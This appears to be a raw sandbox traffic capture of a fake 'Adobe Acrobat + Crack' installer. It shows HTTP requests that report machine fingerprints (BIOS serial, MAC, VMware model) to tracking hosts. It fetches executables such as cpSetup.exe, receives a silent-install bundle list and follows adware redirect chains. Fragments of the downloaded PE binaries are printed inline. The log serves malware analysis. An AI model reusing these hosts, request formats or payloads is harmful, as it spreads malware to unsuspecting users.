....%.............................LP.........................^ >....................F.o.n.t.A.w.e.s.o.m.e.....R.e.g.u.l.a.r...$.V.e.r.s.i.o.n. .4...4...0. .2.0.1.5...&.F.o.n.t.A.w.e.s.o.m.e. .R.e.g.u.l.a.r.....BSGP.........................!..........Y.D.M.F..x...>..........)Y......h..D....pj.....K......*....0....~.71.^..{.. rAP..u;..3..K..?]..:..y..f..`..o........&.d:..e.DgK...R..%......q..H...:........<Bt....]....Nbf..JH.%.....~..S...G....8.I.a.U.-&..q..1.....#`U.....W.L.g.E. q...y..:..g$8..eAV....3.e....u.j...z..i.@.......a.=%..0..O.\O... "3..ef.0c..@....$.....*...qD..E.".(./.Jv.......,^&N?.'c....-.1f*.}..............)..k\eL...e......86Qp...f.vX...*X..C.;Ve..P CKW.a.Z...d....?.pK.U.<T......l......RT........$*.Q........YE............e....OI.....!..........FE].CE..r>.s..d.W.....*0#....Q.T.......:...b....#...@Ym....{..D.t.......!..Z.....d.......S..........Qv'...x...U.L.89......96.....,.Be.....r.R... 5.....XW......N..J.._;.J......%.$...-n.pr..t.......pL...V...{..@....L....."7.....B...|.......7J...c*...e...K..d...=..x.......|4.!.d...(.A...`_o...s..[.0H^..L.pa..)1P...8S.A..s6LD....o...K..$.SD..RIU..W.,. u@:.5W.......NFG.g.i<.Y.F..P`1%..R...Ib..>.....s..g1{.L.B..#..}aD0.`.C*..............'../a9.....H}...d...#."...4.z.@c1....5n..@.r...6.7..&...Z..X.06...Ma]..b*....6.....Ql..|.....]..x<..E..D0f'.B.._.....'.h...A.3...w...7...@o|.../J.[.s......e......../.".RB.mB.....k>&l@.r....,...4.lg.....:eQ.......Z...<#...(t....8..PaL,n.r'....n.p8...`:.*.C.(......H2....V.f......S......9..jK;..'".zJ..zY.=
<<< skipped >>>
POST hXXp://will.ymuscaesnortin.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: will.ymuscaesnortin.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 602
cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=1912&id[]=1913&id[]=2557&id[]=2558&id[]=2559&id[]=2560&id[]=2561&id[]=2562&id[]=2563&id[]=2834&id[]=2835&id[]=3023&id[]=3024&id[]=3517&id[]=3518&id[]=3519&id[]=3520&id[]=3617&id[]=3618&id[]=2664&id[]=2665&id[]=2666&id[]=2667&id[]=2668&id[]=2669&id[]=2670&id[]=2671&id[]=2672&id[]=2673&id[]=2674&id[]=2675&id[]=1914&id[]=1915&id[]=2534&id[]=2536&id[]=2537&id[]=2538&id[]=2539&id[]=2541&id[]=2542&id[]=2543&id[]=2544&id[]=2545&id[]=2546&id[]=2547&id[]=2548&id[]=2549&id[]=2550&id[]=2551&id[]=2552&id[]=2553&id[]=2554&id[]=2555&id[]=2556&id[]=3266&id[]=2695
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Sun, 27 Nov 2016 15:38:15 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 93c5c2940efa6748481c787e7c245f82.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 2V_U9yCYMa6XDOCQ6ClUAPr3RaMHJ3lbx2Et3RQgqm9-CypCvoY-kg==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">.<TITLE>ERROR: The request could not be satisfied</TITLE>.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The request could not be satisfied.</H2>.<HR noshade size="1px">.This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests..<BR clear="all">.<HR noshade size="1px">.<PRE>.Generated by cloudfront (CloudFront).Request ID: 2V_U9yCYMa6XDOCQ6ClUAPr3RaMHJ3lbx2Et3RQgqm9-CypCvoY-kg==.</PRE>.<ADDRESS>.</ADDRESS>.</BODY></HTML>..
GET /report.php?typ=sys&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&transId=139867460&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.7188832209728342 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: ee.wintervenepest.bid
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 27 Nov 2016 15:37:30 GMT
Content-Length: 0
HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/8.5..X-Powered-By: PHP/5.3.28..Date: Sun, 27 Nov 2016 15:37:30 GMT..Content-Length: 0..
GET /stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: off.ncongruousric.bid
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 67426
Connection: keep-alive
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="583afdd9a9098.exe"
X-Powered-By: ASP.NET
Date: Sun, 27 Nov 2016 15:38:02 GMT
X-Cache: Miss from cloudfront
Via: 1.1 e4a44efc4b3241dc23019df63a1f645c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: mqZv_Hk7WsVo5gRdzQsl8YqdXLbfXdm6CwSxY3B06yeKlYsWx7oY_w==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...|...B...:............@.......................................@.................................p................................`.......................................................................................text....s.......t.................. ..`.rdata... .......,...x..............@..@.data.... ..........................@....ndata...................................rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H......G..H.P.u..u..u.....@..K...SV.5..G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h.jG.W....@..u.W...u....E.P.u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ
<<< skipped >>>
POST hXXp://ee.wintervenepest.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.wintervenepest.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 602
cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=1912&id[]=1913&id[]=2557&id[]=2558&id[]=2559&id[]=2560&id[]=2561&id[]=2562&id[]=2563&id[]=2834&id[]=2835&id[]=3023&id[]=3024&id[]=3517&id[]=3518&id[]=3519&id[]=3520&id[]=3617&id[]=3618&id[]=2664&id[]=2665&id[]=2666&id[]=2667&id[]=2668&id[]=2669&id[]=2670&id[]=2671&id[]=2672&id[]=2673&id[]=2674&id[]=2675&id[]=1914&id[]=1915&id[]=2534&id[]=2536&id[]=2537&id[]=2538&id[]=2539&id[]=2541&id[]=2542&id[]=2543&id[]=2544&id[]=2545&id[]=2546&id[]=2547&id[]=2548&id[]=2549&id[]=2550&id[]=2551&id[]=2552&id[]=2553&id[]=2554&id[]=2555&id[]=2556&id[]=3266&id[]=2695
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 27 Nov 2016 15:37:22 GMT
Connection: close
Content-Length: 76128
_..BL.[7.B.....~..>.k...F.)0.B.$}6..@$0N).Z.U}y.d..B...)5....k...f\.~....8....EK.).8........X c..j. ....b....V......7ZX'o...b.~9.x .?...G...X...c.?.....G.z.EZ.^M..OI..,..19.AL.y3..-......D.......W....Ku.Y.}.2..N.6....-.J...Tq...G.-.9.c..5..F.s..;b].F..f.Pj....;ox.....wdB....j.u..4] 5[y.i..L..\m..Y. .!.!lvgT..equ....>.%..|.M..........Z..b.q.|.I9.3..m..O....."AFI........PI..fA..y..'&.S<:..5D.Rj.8;gN....#.......u....O.u..zq...h..C..?I..........#..cL....E8...v.d:....S..}-.@.g....T..C.KQg... .0....N.3....8...v..P;..d.F4.R.....M.x.(.]....e...T}F7].Ii..6.-..@.C..~;..:E7$<.................w...NT6.;..n.5..E\.R.....x......>Z.......!..(-3..o.K...b^].Y.za^'.b.....[..y......0..Y..shC..^$....U....N.....z.t.F.[....YN..i........>.EJ.!.a.R.e.........?.....i.I....1=.7XJ...F).pV_.J.N.P%R.;...}...&...M.... .l.=).d....V.5W.P.mP...5i...}.k.....i.....B...TJ.....D.P..}....Y!......._y.]..;..B..........a.m..bt.{3W".a.e.y...P...........3..f.q....w\.....N..H...B.......@Nv.G......%E....Wv......1y.....v.XkF.A..{n#.....l.@f4..=...lP...yv. ...(..V..V.G..g;DKs.e..]..]....c......?...L...K.1v..B..b.v.....*o.F....c.L...Srb.g~...\.._.........\....&.......?;.....*5..t.~g..>...3~su.....usK.p...M.6.4..?....XYr)W..Ak.Nq......E...6..,....].. ...>.XW9 ...!........0.2.....f...=%'c.@...2...f....k.f....Y...z..t.'\............Z{k..n.:.A......r....[..k.E..,.;..~.........?H......3.{....'..$U/q..-.....;9p_m~b...y..g...tV`x....k..b.!.../..j..m.....e..}.....!x..K.S>7.%.sI&&>......7Fe.Nh.u.2...`.HJd..Ga:.Og. &...Y.j.xh.......hv..4...
<<< skipped >>>
GET /normal_bg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d2adi7hu49xk5t.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 26781
Connection: keep-alive
Date: Thu, 22 Sep 2016 18:01:12 GMT
Last-Modified: Mon, 13 Jun 2016 11:29:07 GMT
ETag: "b5b0ebe137c0293f816eaac3de2b4e51"
Accept-Ranges: bytes
Server: AmazonS3
Age: 74433
X-Cache: Hit from cloudfront
Via: 1.1 14484a063800eaed878a3068abf4dfac.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RczU8nabXC7YY05ZRPnbSYN4ruZ16XLLgkDlYC3eb6xeh2YUccPUaQ==
......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.146729, 2012/05/03-13:40:03 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 Windows" xmpMM:InstanceID="xmp.iid:889F23E5F49B11E4A1FBA1E3C36AE7EE" xmpMM:DocumentID="xmp.did:889F23E6F49B11E4A1FBA1E3C36AE7EE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:889F23E3F49B11E4A1FBA1E3C36AE7EE" stRef:documentID="xmp.did:889F23E4F49B11E4A1FBA1E3C36AE7EE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...................................................................................................................................................E....................................................................................!.1AQa...q.....2R..u.7...."...U..B.....5.b..%4Tte'r.E..#$D......................!1."AQ2.a..BR.q...b.#3.....r......S......C.............?....j9...n..OK....xr...8..q.C..o..k.k..L[3...v....z.zqNi(...T..#.mJ..TU.....SYi.U.-[NJ9..e.IU.;.k.KY...Rm..{.....K...M..D.b...E.;.k.K[..#&.kG.....F..........k~p., ....J. .0...K-7.(..m..2q...1.}.V.1l...U........E.....*..5..fi.Oe.{...
<<< skipped >>>
GET /9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999 HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: aclick.adhoc2.net
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Sun, 27 Nov 2016 15:38:41 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da060fb656d4e2b9f0756b182bd523f481480261121; expires=Mon, 27-Nov-17 15:38:41 GMT; path=/; domain=.adhoc2.net; HttpOnly
Location: hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999
Server: cloudflare-nginx
CF-RAY: 3086ab26d67b4014-SOF
b3..<a href="hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999">Found</a>.....0..HTTP/1.1 302 Found..Date: Sun, 27 Nov 2016 15:38:41 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=da060fb656d4e2b9f0756b182bd523f481480261121; expires=Mon, 27-Nov-17 15:38:41 GMT; path=/; domain=.adhoc2.net; HttpOnly..Location: hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999..Server: cloudflare-nginx..CF-RAY: 3086ab26d67b4014-SOF..b3..<a href="hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999">Found</a>.....0..
GET /get.php?ses=482796663418412224 HTTP/1.0
Host: away.yosauruslega.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 753152
Connection: close
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 01 Jan 2014 00:00:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Access-Control-Allow-Origin: *
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="cpSetup.exe"
Date: Sun, 27 Nov 2016 15:37:18 GMT
X-Cache: Miss from cloudfront
Via: 1.1 23d92aa442d5ae9ed0313643d8764687.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Tb6ZJ-_nkdTtqyG7ZIBb1o9GqM223LHzFjNSNfbX87GUeAUw5AtP-Q==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I..H(..H(..H(....N.D(....L..(....M.U(..sv..^(..sv..s(..sv..j(....t.M(..H(..((...v..Y(...v@.I(..H((.I(...v..I(..RichH(..........................PE..L.....:X.................F...N......pF.......`....@.......................................@.....................................P...............................8;..P9..8....................9.......9..@............`..<............................text....D.......F.................. ..`.rdata.......`...0...J..............@....data... ............z..............@....gfids...............z..............@..@.rsrc................~..............@..@.reloc...@.......B...<..............@...........................................................................................................................................................................................................................................................................U..Qj .3/......E..E....J...]....U..j....J......]................U..j....J......]...................J..fP..h0TF...3..Y...........h..G....J...O..h@TF...3..Y......j......hPTF....0G....J..y3.........J....J.....J......hzTF..V3..Y.h.TF..J3..Y.h.TF..>3..Y.j.j.h..J....J..R...h.TF...3..Y.VWj......Y...J..........j.V......J.dnF..4...h.TF...2..Y_^....J.........J..w...h.TF...2..Y.h.TF...2..Y....J..U...h.TF...2..Y.............U........E..T..8G....E..E...]...U...E.P......E.....$........]...U..Q.M..E....aF.3..U...
<<< skipped >>>
GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg== HTTP/1.1
Cache-Control: max-age = 564348
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 12 Oct 2016 22:33:53 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: g.symcd.com
HTTP/1.1 200 OK
Server: nginx/1.10.1
Content-Type: application/ocsp-response
Content-Length: 1362
content-transfer-encoding: binary
Cache-Control: max-age=563498, public, no-transform, must-revalidate
Last-Modified: Sun, 27 Nov 2016 04:06:13 GMT
Expires: Sun, 4 Dec 2016 04:06:13 GMT
Date: Sun, 27 Nov 2016 15:38:44 GMT
Connection: keep-alive
0..N......G0..C.. .....0.....40..00.......j.#.p.e$.\ps.*.. .j..20161127040613Z0f0d0<0... ..........9.....yP..`...<.......*.A.....>U....... ...:.....20161127040613Z....20161204040613Z0...*.H.............n%... l8.(,.Q`.j...:..6.xSGt*.....[.....(.S.V....gS.7.....R..}.Sl....{..._..m.@..^.).>.....(..../.ze.F.f:..m.<@...Z.A.H.....&1Z .'......~.X..:.[:/...n..SO I.8M.#w.0.D..$P.....,.......G[....~q..C.....Kp.~.`SQ.N....`.~&.sP.D.........9..t...:5...'....u.l.........0...0..|0..d........:.0...*.H........0B1.0...U....US1.0...U....GeoTrust Inc.1.0...U....GeoTrust Global CA0...151203170230Z..161214170230Z02100...U...'GeoTrust Global CA TGV OCSP Responder 40.."0...*.H.............0.........[.c.#zj......RME.....,......(..U......!-.l..R..E.~..%."./8mv..D...*...Rx........mw.~2..Q5T\.H...Wk*..a.z.$._..T......;T.S.r(._*.G....^.P.!.3..t.......s......P....C._.g.b.oK...EV..>...>.|.o.~quo.............v4..Tt....Q.]A.Y......... w.E..=.%.n7.......{" *C........0..0...U.#..0....z.h.....d..}.}e...N0... .....0......0...U.%..0... .......0...U...........0...U.......0.0 ..U....0...0.1.0...U....TGV-C-670...*.H...............aEc<..'R......]C.ri.Zm.....|..B.$..76..h....l...Xbxua...C.X.S....~K..A..._.T@$.....9(.... ......\.*.....5.b.x...[QM.._9P.=..l...gf..L.?..3 ......Z....._...20R;...x.......C..0....l.G.A..5TS>d.U......w.(\....v..9.z7.....J..;..'...u.Y...BB.@.2u.e..eW..J.U....
<<< skipped >>>
GET /launch_v5.php?p=sevenzip&pid=2735&tid=10958132&b_typ=pe&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBN&reb=1&ic= HTTP/1.0
Host: get.enomenalco.club
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 871
Connection: close
Date: Sun, 27 Nov 2016 15:38:05 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 3df8c233328fbbb4fd91eb496d73f2d8.cloudfront.net (CloudFront)
X-Amz-Cf-Id: e8d2sKG-Rk6x8CGWhvDe4g0XzMRR9SWs9pQwMPHTkmgpIXg8EyIF4Q==
files=4.t1=dl.u1=hXXp://get.ynoptisticglob.bid/?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1.n1=cpSetup.exe.b1=cp.c1=sevenzip-1.s1=0.m1=0.d1=0.t2=dl.u2=hXXp://wet.sodcattilyrem.bid/stub_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=Adobe Acrobat%20XI Pro 11.0.18 M.n2=sevensetup.exe.b2=rx.c2=sevenzip-1.s2=0.m2=0.d2=0.t3=dl.u3=hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png.n3=Setup__2140_il2.exe.b3=am.c3=2140-sevenzip.s3=0.m3=0.d3=0.fn1=Components.fn2=File opener.fn3=File finder.fn4=SevenZip.ftitle=to run your file.itype=silent...
GET /taveara?q=Adobe Acrobat XI Pro 11.0.18 M HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: gurusetman.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Date: Sun, 27 Nov 2016 15:38:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dcffe8a79a413e2d5aac5285621a4dd561480261106; expires=Mon, 27-Nov-17 15:38:26 GMT; path=/; domain=.gurusetman.info; HttpOnly
X-Powered-By: PHP/5.4.37
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Last-Modified: Sun, 27 Nov 2016 15:38:26 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: hXXp://tobacted.info?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: *
Access-Control-Request-Headers: *
Server: cloudflare-nginx
CF-RAY: 3086aacc60c92950-OTP
0..HTTP/1.1 301 Moved Permanently..Date: Sun, 27 Nov 2016 15:38:27 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=dcffe8a79a413e2d5aac5285621a4dd561480261106; expires=Mon, 27-Nov-17 15:38:26 GMT; path=/; domain=.gurusetman.info; HttpOnly..X-Powered-By: PHP/5.4.37..Pragma: no-cache..Cache-Control: no-cache, no-store, must-revalidate, max-age=0..Cache-Control: post-check=0, pre-check=0..Last-Modified: Sun, 27 Nov 2016 15:38:26 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Location: hXXp://tobacted.info?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3..Access-Control-Allow-Credentials: true..Access-Control-Allow-Headers: *..Access-Control-Request-Headers: *..Server: cloudflare-nginx..CF-RAY: 3086aacc60c92950-OTP..0..
<<< skipped >>>
GET /css/twin.css HTTP/1.1
Accept: text/css
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tour.cinemaden.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css
Date: Sun, 27 Nov 2016 15:38:42 GMT
ETag: W/"58372388-3b06f"
Last-Modified: Thu, 24 Nov 2016 17:29:44 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
transfer-encoding: chunked
Connection: keep-alive
5eef..............gs.J.(....v:&^......x... @....7xC8......M..D.......F.X*......'....rB......6....o..'.?.../.~.. .7.....;.............$...ed7u^V...%.Uy.K..^.R...../I.xY.......`8/...)..{^...~...?...?..(-..~i../.3.x..mU..<.@#ET}w..v.....4J....H...U....W.A.c........cx`....'.q...{.z.W^={$. #...<....r@......y....C......6"..dy....hl0./n.ZQ.....u......../nt..KUX.__..H.../..{......z.}.Q..._........__..#.....k.V..?........y......Z ....}q....]....*\.....(......l../g@..g...*...Z.n8....<..Uc.....P{.@..B.........wh..u....o.o......`......'.=P.x........N.....X......<.X.....:....U..3<bU..7........V..7^j{....f.'.....t.u.:...|.U.e.3..&(o...-.......3.U5ij..J...........`<........\...........G...Ov^.&...5...z....A.}.....f%..W.....Q .f%Q.p.`E&Q.......?}.......c.~...~..p..H...8....0'....o.7H.@.x.6.....V.%._...=.....l...S..l.p...7v.......:`......o@.=}|m.....oyl.....,}s.$...t..nh.~.,a.>.C..6......E.......$.)...V.-.c..".."s.Pu.dea.``."..y..........K...qc...e8.......A..v!..o.....*.$......H.m...q.~..w.^..koK....M5,........./..G.Zn~.X.....l./.__...#......`.G...C......x.g3..<..m]x....n&.......=.....}0..c........b....._n6.o/...2......o....(./.?c..z#.&...}.t.KA`....K...p.....a2............5r...G.({.....g$#..-Y.7....,...9.`.&.....;x.#~d..........7t.B.........:..z.. .../#.[;......k...e.. ..?.s.B...?>.:L?..?J.....my....{%......`.}.#`.U._....`z../.......?....0o2...m............]Y.9.E...=l..K..R./..g..g....a..8o......D........F"......h.....W..G.o........V..%..'i/.h~....`I........bX,_........@..)1~x3B~0C.,....F....S...<
<<< skipped >>>
GET /?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=Adobe Acrobat XI Pro 11.0.18 M&type=setup&size=3145728&sub_id=346&sub_id2=ln86-ZoKmjAJkuOLcsi728C2NH7ENZEGrFMjOq6wQF_yVfdEDMrjilc_By0jfMGzhQlsgK0Jt-nbRI0I78ZQu2uSL5R0GVNFvaqOpbYhpyfY-kKwY3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
Host: tobacted.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Date: Sun, 27 Nov 2016 15:38:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d6eda53e888ba9059880b27824ddbd7461480261107; expires=Mon, 27-Nov-17 15:38:27 GMT; path=/; domain=.tobacted.info; HttpOnly
X-Powered-By: PHP/5.4.16
Location: hXXp://elja.linggyp.ru/9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye
Server: cloudflare-nginx
CF-RAY: 3086aad035062914-OTP
0..HTTP/1.1 302 Moved Temporarily..Date: Sun, 27 Nov 2016 15:38:27 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Set-Cookie: __cfduid=d6eda53e888ba9059880b27824ddbd7461480261107; expires=Mon, 27-Nov-17 15:38:27 GMT; path=/; domain=.tobacted.info; HttpOnly..X-Powered-By: PHP/5.4.16..Location: hXXp://elja.linggyp.ru/9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye..Server: 